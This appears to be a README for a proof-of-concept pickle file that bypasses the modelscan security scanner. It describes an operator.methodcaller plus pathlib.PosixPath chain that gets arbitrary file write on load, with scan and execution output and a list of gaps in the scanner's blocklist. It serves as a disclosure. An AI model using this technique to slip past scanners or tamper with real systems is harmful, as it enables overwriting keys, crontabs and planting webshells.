manja316's picture
Add README with bypass details
e827e1e verified

Modelscan Bypass PoC — pathlib.PosixPath.write_text

Summary

This pickle file bypasses ProtectAI's modelscan scanner and achieves arbitrary file write when loaded with pickle.load() or torch.load().

Technique

Uses pathlib.PosixPath combined with operator.methodcaller("write_text", ...) to write arbitrary content to any file path. Neither pathlib nor operator.methodcaller appear in modelscan's unsafe_globals blocklist.

Chain: operator.methodcaller("write_text", "<content>") → pathlib.PosixPath("<target_path>")

Scan Result

$ modelscan scan -p model.pkl
No issues found! 🎉

Execution Result

$ python3 -c "import pickle; pickle.load(open('model.pkl','rb'))"
$ cat /tmp/pwned_pathlib.txt
PWNED_VIA_PATHLIB

Impact

Arbitrary file write — can overwrite config files, crontabs, SSH authorized_keys, or drop webshells. Combined with pathlib.PosixPath.read_text (via a second methodcaller), also enables arbitrary file read.

Blocklist Gaps

  1. pathlib module — entirely missing from unsafe_globals
  2. operator.methodcaller — not blocked (only operator.attrgetter is listed)